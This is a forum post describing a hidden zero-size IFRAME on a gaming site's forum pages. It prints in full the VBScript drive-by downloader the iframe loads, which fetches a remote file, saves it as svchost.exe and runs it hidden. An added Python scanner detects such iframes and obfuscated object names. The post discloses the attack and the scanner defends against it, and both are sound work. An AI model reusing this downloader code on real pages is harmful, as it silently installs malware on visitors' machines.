hmm yeah, on inspection, inside the HTML for that page is an
Code:
</style><iframe src=http://wow.XXXXXXXXX.com/wow.htm width=0 height=0></iframe>
(I've changed the URL so people won't click on it, or be tempted to follow it), the source of the HTML under the IFRAME element that's loaded from that URL is a blank page with only:
Code:
<script language="VBScript">
on error resume next
dl = "http://wow.XXXXXXXXXX.com/mywow.rar"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="svchost.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
tmpcctv= x.responseBody
S.write tmpcctv
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
and inside the "mywow.rar" file is probably some kind of virus, AntiVir stops access when I try and download it saying "The file name contains an executable file extension disguised as a harmless one" ("HEUR-DBLEXT/Crypted"). This all doesn't seem to do anything automatically in Firefox, but ughh if Internet Explorer actually executes the code in the IFRAME :/ I thought worldofwar.net was supposed to be a credible site, at least I hear some people talk about it and stuff :/. Also I've noticed that this IFRAME element is only found on the forum pages, and it seems to be inside some CSS that's probably automatically included by the server, or something.
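As an added example (not part of the original post): a small Python scanner that flags the two things described above in a saved page, a zero-size IFRAME and a script that builds an object name from string fragments, alongside the classid quoted in the post. The sample HTML, the `host.example` placeholder and the names `scan` and `resolve_strings` are constructed for illustration.

```python
import re
from html.parser import HTMLParser
# Constructed sample modelled on the post; host.example is a placeholder.
SAMPLE = """</style><iframe src=http://host.example/wow.htm width=0 height=0></iframe>
<script language="VBScript">
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
</script>"""
CLASSID = "bd96c556-65a3-11d0-983a-00c04fc29e36"  # classid quoted in the post (RDS.DataSpace)
PROGIDS = {"adodb.stream", "microsoft.xmlhttp", "shell.application", "scripting.filesystemobject"}
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')

def resolve_strings(script):  # fold simple `name = "lit" & var` assignments into values
    env = {}
    for m in filter(None, map(ASSIGN.match, script.splitlines())):
        parts = [p.strip() for p in m.group(2).split("&")]
        vals = [p[1:-1] if re.fullmatch(r'"[^"]*"', p) else env.get(p.lower()) for p in parts]
        if None not in vals:          # every operand was a literal or a known variable
            env[m.group(1).lower()] = "".join(vals)
    return env

class Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self.buf = [], []
    def handle_starttag(self, tag, attrs):
        a, self.buf = dict(attrs), []  # new element: restart the text buffer
        if tag == "iframe" and a.get("width") == "0" and a.get("height") == "0":
            self.findings.append(("hidden-iframe", a.get("src", "")))
    def handle_data(self, data):
        self.buf.append(data)          # script bodies arrive here as raw text
    def handle_endtag(self, tag):
        script, self.buf = "".join(self.buf), []
        if tag == "script":
            if CLASSID in script.lower():
                self.findings.append(("classid", CLASSID))
            hits = {v.lower() for v in resolve_strings(script).values()} & PROGIDS
            self.findings += [("progid", p) for p in sorted(hits)]

def scan(html):
    s = Scanner()
    s.feed(html)
    s.close()
    return s.findings
```

A plain substring search for "Adodb.Stream" finds nothing in the sample because the name never appears whole; folding the assignments first is what exposes it.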